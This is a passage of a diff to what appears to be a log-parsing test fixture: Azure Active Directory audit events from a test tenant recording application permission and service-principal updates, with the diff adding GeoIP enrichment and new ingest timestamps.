"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -3555,6 +3783,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -3699,7 +3939,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124945600Z", + "ingested": "2021-12-14T14:48:43.176647980Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -3726,6 +3966,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -3879,7 +4131,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124949900Z", + "ingested": "2021-12-14T14:48:43.176648645Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.6473040Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492835\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"76f9b173-c35c-4dbb-b5f7-64750ae994ce\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -3906,6 +4158,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4050,7 +4314,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124955100Z", + "ingested": "2021-12-14T14:48:43.176649274Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4077,6 +4341,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4221,7 +4497,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124961200Z", + "ingested": "2021-12-14T14:48:43.176649997Z", "original": 